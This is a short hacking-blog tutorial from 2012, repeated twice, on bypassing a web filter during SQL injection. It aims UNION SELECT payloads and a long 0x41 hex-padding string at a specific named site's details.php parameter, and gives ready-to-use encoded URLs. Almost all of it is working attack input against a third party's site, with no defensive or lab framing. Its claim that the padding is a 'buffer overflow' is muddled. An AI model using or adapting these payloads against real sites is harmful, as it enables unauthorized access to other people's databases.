- Back to Home »
- Tricks And Tutorials »
- Sql Injection Bypassing 500 Error
Tuesday, June 26, 2012
First
http://bryansmarine.com/details.php?id=319
Extract the number of columns using UNION BASSED
:: Easy ::
www.bryansmarine.com/details.php?id=319 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- -
Oops 500 Internal Server ErrorInternal
where 'union select' returns error 500 internal server error use this Buffer Overflow Query
PHP Code: +and+(select 1)=(Select 0x414141 1000 more 41's)
if 41 dosent work,use 0xAA
Before +union+select+ we put it
:: First ::
0x : You tell the site to read the hex value
1000 more 41's : Means to repeat the letter a thousand times No. 41
:: like ::
PHP CODE:
+And(select 1)=(select 0x414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)+
PHP CODE:
http://www.bryansmarine.com/details.php?id=319+And%28select%201%29=%28select%200x414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141%29+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--%20-
DONE
CREDIT:BLACKROAS
http://bryansmarine.com/details.php?id=319
Extract the number of columns using UNION BASSED
:: Easy ::
www.bryansmarine.com/details.php?id=319 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- -
Oops 500 Internal Server ErrorInternal
where 'union select' returns error 500 internal server error use this Buffer Overflow Query
PHP Code: +and+(select 1)=(Select 0x414141 1000 more 41's)
if 41 dosent work,use 0xAA
Before +union+select+ we put it
:: First ::
0x : You tell the site to read the hex value
1000 more 41's : Means to repeat the letter a thousand times No. 41
:: like ::
PHP CODE:
+And(select 1)=(select 0x414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)+
PHP CODE:
http://www.bryansmarine.com/details.php?id=319+And%28select%201%29=%28select%200x414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141%29+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--%20-
DONE
CREDIT:BLACKROAS